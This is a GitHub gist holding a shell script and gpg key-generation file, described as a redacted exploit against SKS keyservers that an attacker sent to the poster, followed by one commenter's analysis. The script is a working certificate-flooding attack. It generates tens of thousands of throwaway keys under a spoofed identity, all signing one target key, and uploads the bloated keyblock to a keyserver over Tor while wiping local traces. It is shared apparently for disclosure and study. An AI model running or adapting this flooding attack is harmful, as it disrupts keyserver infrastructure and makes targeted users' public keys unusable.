Last active
December 13, 2020 16:38
-
-
Save lukateras/8d57c7892d4bcd50d11e69f71b1f80bf to your computer and use it in GitHub Desktop.
Redacted SKS exploit that was sent to me by attacker behind https://news.ycombinator.com/item?id=20312826
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
for _ in {1..500}; do | |
for _ in {1..100}; do | |
gpg --gen-key --batch keygen | |
gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C | |
rm ~/.gnupg/private-keys-v1.d/*.key | |
done | |
rm ~/.gnupg/openpgp-revocs.d/*.rev | |
gpg -a --export > ~/Desktop/keyblock.asc | |
rm ~/.gnupg/pub* | |
rm ~/.gnupg/tofu.db | |
rm ~/.gnupg/trustdb.gpg | |
rm -r ~/.gnupg/openpgp-revocs.d | |
rm -r ~/.gnupg/private-keys-v1.d | |
mkdir ~/.gnupg/private-keys-v1.d | |
gpg --import ~/Desktop/yt.asc | |
curl \ | |
--socks5-hostname localhost:9050 \ | |
--data-urlencode "keytext@keyblock.asc" \ | |
--max-time 60 \ | |
example.com:11371/pks/add | |
rm ~/Desktop/keyblock.asc | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Key-Type: default | |
Subkey-Type: default | |
Name-Real: Marc Horowitz | |
Name-Comment: Yegor, you did a great SKS research job so far! Hope you are well! May the best team win! :-) | |
Name-Email: marc@mit.edu | |
Expire-Date: 0 | |
%no-protection | |
%commit |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
It seems the main difficulty in this attack is preventing GnuPG from DoS'ing itself, so the home directory has to be purged frequently. Thanks for sharing this, it illustrates that no sophisticated tool like trollwot was necessary for the attack.